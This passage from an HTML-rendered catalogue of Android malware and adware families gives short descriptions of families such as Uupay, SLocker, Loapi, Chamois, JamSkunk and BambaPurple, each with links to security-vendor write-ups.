<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-031805-2722-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-031805-2722-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uranico"><a class="anchor" href="#_uranico"></a><a class="link" href="#_uranico">Uranico</a></h3>
<div class="paragraph">
<p>Uranico is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 386. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-052803-3835-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-052803-3835-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_usbcleaver"><a class="anchor" href="#_usbcleaver"></a><a class="link" href="#_usbcleaver">Usbcleaver</a></h3>
<div class="paragraph">
<p>Usbcleaver is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 387. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_utchi"><a class="anchor" href="#_utchi"></a><a class="link" href="#_utchi">Utchi</a></h3>
<div class="paragraph">
<p>Utchi is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 388. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-2536-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-2536-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uten"><a class="anchor" href="#_uten"></a><a class="link" href="#_uten">Uten</a></h3>
<div class="paragraph">
<p>Uten is a Trojan horse for Android devices that may send, block, and delete SMS messages on a compromised device. It may also download and install additional applications and attempt to gain root privileges.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 389. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-092316-4752-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-092316-4752-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uupay"><a class="anchor" href="#_uupay"></a><a class="link" href="#_uupay">Uupay</a></h3>
<div class="paragraph">
<p>Uupay is a Trojan horse for Android devices that steals information from the compromised device. It may also download additional malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 390. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-061714-1550-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-061714-1550-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uxipp"><a class="anchor" href="#_uxipp"></a><a class="link" href="#_uxipp">Uxipp</a></h3>
<div class="paragraph">
<p>Uxipp is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 391. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-060910-5804-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-060910-5804-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vdloader"><a class="anchor" href="#_vdloader"></a><a class="link" href="#_vdloader">Vdloader</a></h3>
<div class="paragraph">
<p>Vdloader is a Trojan horse for Android devices that opens a back door on the compromised device and steals confidential information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 392. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080209-1420-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080209-1420-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vdopia"><a class="anchor" href="#_vdopia"></a><a class="link" href="#_vdopia">VDopia</a></h3>
<div class="paragraph">
<p>VDopia is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 393. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-1559-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-1559-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_virusshield"><a class="anchor" href="#_virusshield"></a><a class="link" href="#_virusshield">Virusshield</a></h3>
<div class="paragraph">
<p>Virusshield is a Trojan horse for Android devices that claims to scan apps and protect personal information, but has no real functionality.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 394. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040810-5457-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040810-5457-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vserv"><a class="anchor" href="#_vserv"></a><a class="link" href="#_vserv">VServ</a></h3>
<div class="paragraph">
<p>VServ is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 395. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-3117-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-3117-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_walkinwat"><a class="anchor" href="#_walkinwat"></a><a class="link" href="#_walkinwat">Walkinwat</a></h3>
<div class="paragraph">
<p>Walkinwat is a Trojan horse that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 396. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-033008-4831-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-033008-4831-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_waps"><a class="anchor" href="#_waps"></a><a class="link" href="#_waps">Waps</a></h3>
<div class="paragraph">
<p>Waps is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 397. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040406-5437-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040406-5437-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_waren"><a class="anchor" href="#_waren"></a><a class="link" href="#_waren">Waren</a></h3>
<div class="paragraph">
<p>Waren is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 398. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5501-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5501-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windseeker"><a class="anchor" href="#_windseeker"></a><a class="link" href="#_windseeker">Windseeker</a></h3>
<div class="paragraph">
<p>Windseeker is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 399. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-101519-0720-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-101519-0720-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wiyun"><a class="anchor" href="#_wiyun"></a><a class="link" href="#_wiyun">Wiyun</a></h3>
<div class="paragraph">
<p>Wiyun is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 400. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-5646-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-5646-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wooboo"><a class="anchor" href="#_wooboo"></a><a class="link" href="#_wooboo">Wooboo</a></h3>
<div class="paragraph">
<p>Wooboo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 401. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-5829-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-5829-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wqmobile"><a class="anchor" href="#_wqmobile"></a><a class="link" href="#_wqmobile">Wqmobile</a></h3>
<div class="paragraph">
<p>Wqmobile is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 402. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4926-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4926-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yahooads"><a class="anchor" href="#_yahooads"></a><a class="link" href="#_yahooads">YahooAds</a></h3>
<div class="paragraph">
<p>YahooAds is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 403. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-3229-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-3229-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yatoot"><a class="anchor" href="#_yatoot"></a><a class="link" href="#_yatoot">Yatoot</a></h3>
<div class="paragraph">
<p>Yatoot is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 404. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-031408-4748-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-031408-4748-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yinhan"><a class="anchor" href="#_yinhan"></a><a class="link" href="#_yinhan">Yinhan</a></h3>
<div class="paragraph">
<p>Yinhan is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 405. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-3350-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-3350-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_youmi"><a class="anchor" href="#_youmi"></a><a class="link" href="#_youmi">Youmi</a></h3>
<div class="paragraph">
<p>Youmi is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 406. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4318-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4318-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yume"><a class="anchor" href="#_yume"></a><a class="link" href="#_yume">YuMe</a></h3>
<div class="paragraph">
<p>YuMe is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 407. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-0322-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-0322-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeahache"><a class="anchor" href="#_zeahache"></a><a class="link" href="#_zeahache">Zeahache</a></h3>
<div class="paragraph">
<p>Zeahache is a Trojan horse that elevates privileges on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 408. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-032309-5042-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-032309-5042-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zertsecurity"><a class="anchor" href="#_zertsecurity"></a><a class="link" href="#_zertsecurity">ZertSecurity</a></h3>
<div class="paragraph">
<p>ZertSecurity is a Trojan horse for Android devices that steals information and sends it to a remote attacker.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 409. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-050820-4100-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-050820-4100-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zestadz"><a class="anchor" href="#_zestadz"></a><a class="link" href="#_zestadz">ZestAdz</a></h3>
<div class="paragraph">
<p>ZestAdz is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 410. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052616-3821-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052616-3821-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeusmitmo"><a class="anchor" href="#_zeusmitmo"></a><a class="link" href="#_zeusmitmo">Zeusmitmo</a></h3>
<div class="paragraph">
<p>Zeusmitmo is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 411. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080818-0448-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080818-0448-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_slocker"><a class="anchor" href="#_slocker"></a><a class="link" href="#_slocker">SLocker</a></h3>
<div class="paragraph">
<p>The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.</p>
</div>
<div class="paragraph">
<p>SLocker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SMSLocker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 412. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/">http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/">http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loapi"><a class="anchor" href="#_loapi"></a><a class="link" href="#_loapi">Loapi</a></h3>
<div class="paragraph">
<p>A malware strain known as Loapi will damage phones if users don&#8217;t remove it from their devices. Left to its own means, this modular threat will download a Monero cryptocurrency miner that will overheat and overwork the phone&#8217;s components, which will make the battery bulge, deform the phone&#8217;s cover, or even worse. Discovered by Kaspersky Labs, researchers say Loapi appears to have evolved from Podec, a malware strain spotted in 2015.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 413. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/android-malware-will-destroy-your-phone-no-ifs-and-buts-about-it/">https://www.bleepingcomputer.com/news/security/android-malware-will-destroy-your-phone-no-ifs-and-buts-about-it/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_podec"><a class="anchor" href="#_podec"></a><a class="link" href="#_podec">Podec</a></h3>
<div class="paragraph">
<p>Late last year, we encountered an SMS Trojan called Trojan-SMS.AndroidOS.Podec which used a very powerful legitimate system to protect itself against analysis and detection. After we removed the protection, we saw a small SMS Trojan with most of its malicious payload still in development. Before long, though, we intercepted a fully-fledged version of Trojan-SMS.AndroidOS.Podec in early 2015.
The updated version proved to be remarkable: it can send messages to premium-rate numbers employing tools that bypass the Advice of Charge system (which notifies users about the price of a service and requires authorization before making the payment). It can also subscribe users to premium-rate services while bypassing CAPTCHA. This is the first time Kaspersky Lab has encountered this kind of capability in any Android-Trojan.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 414. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/sms-trojan-bypasses-captcha/69169//">https://securelist.com/sms-trojan-bypasses-captcha/69169//</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chamois"><a class="anchor" href="#_chamois"></a><a class="link" href="#_chamois">Chamois</a></h3>
<div class="paragraph">
<p>Chamois is one of the largest PHA families in Android to date and is distributed through multiple channels. While much of the backdoor version of this family was cleaned up in 2016, a new variant emerged in 2017. To avoid detection, this version employs a number of techniques, such as implementing custom code obfuscation, preventing user notifications, and not appearing in the devices app list. Chamois apps, which in many cases come preloaded with the system image, try to trick users into clicking ads by displaying deceptive graphics to commit WAP or SMS fraud.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 415. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html">https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iciclegum"><a class="anchor" href="#_iciclegum"></a><a class="link" href="#_iciclegum">IcicleGum</a></h3>
<div class="paragraph">
<p>IcicleGum is a spyware PHA family whose apps rely on versions of the Igexin ads SDK that offer dynamic code-loading support. IcicleGum apps use this library&#8217;s code-loading features to fetch encrypted DEX files over HTTP from command-and-control servers. The files are then decrypted and loaded via class reflection to read and send phone call logs and other data to remote locations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 416. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/igexin-malicious-sdk">https://blog.lookout.com/igexin-malicious-sdk</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_breadsms"><a class="anchor" href="#_breadsms"></a><a class="link" href="#_breadsms">BreadSMS</a></h3>
<div class="paragraph">
<p>BreadSMS is a large SMS-fraud PHA family that we started tracking at the beginning of 2017. These apps compose and send text messages to premium numbers without the users consent. In some cases, BreadSMS apps also implement subscription-based SMS fraud and silently enroll users in services provided by their mobile carriers. These apps are linked to a group of command-and-control servers whose IP addresses change frequently and that are used to provide the apps with premium SMS numbers and message text.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 417. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jamskunk"><a class="anchor" href="#_jamskunk"></a><a class="link" href="#_jamskunk">JamSkunk</a></h3>
<div class="paragraph">
<p>JamSkunk is a toll-fraud PHA family composed of apps that subscribe users to services without their consent. These apps disable Wi-Fi to force traffic to go through users' mobile data connection and then contact command-and-control servers to dynamically fetch code that tries to bypass the networks WAP service subscription verification steps. This type of PHA monetizes their abuse via WAP billing, a payment method that works through mobile data connections and allows users to easily sign up and pay for new services using their existing account (i.e., services are billed directly by the carrier, and not the service provider; the user does not need a new account or a different form of payment). Once authentication is bypassed, JamSkunk apps enroll the device in services that the user may not notice until they receive and read their next bill.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 418. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fosec.vn/malicious-applications-stayed-at-google-appstore-for-months-d8834ff4de59">https://blog.fosec.vn/malicious-applications-stayed-at-google-appstore-for-months-d8834ff4de59</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_expensive_wall"><a class="anchor" href="#_expensive_wall"></a><a class="link" href="#_expensive_wall">Expensive Wall</a></h3>
<div class="paragraph">
<p>Expensive Wall is a family of SMS-fraud apps that affected a large number of devices in 2017. Expensive Wall apps use code obfuscation to slow down analysis and evade detection, and rely on the JS2Java bridge to allow JavaScript code loaded inside a Webview to call Java methods the way Java apps directly do. Upon launch, Expensive Wall apps connect to command-and-control servers to fetch a domain name. This domain is then contacted via a Webview instance that loads a webpage and executes JavaScript code that calls Java methods to compose and send premium SMS messages or click ads without users' knowledge.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 419. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/">https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bambapurple"><a class="anchor" href="#_bambapurple"></a><a class="link" href="#_bambapurple">BambaPurple</a></h3>
<div class="paragraph">
<p>BambaPurple is a two-stage toll-fraud PHA family that tries to trick users into installing it by disguising itself as a popular app. After install, the app disables Wi-Fi to force the device to use its 3G connection, then redirects to subscription pages without the users knowledge, clicks subscription buttons using downloaded JavaScript, and intercepts incoming subscription SMS messages to prevent the user from unsubscribing. In a second stage, BambaPurple installs a backdoor app that requests device admin privileges and drops a .dex file. This executable checks to make sure it is not being debugged, downloads even more apps without user consent, and displays ads.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 420. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
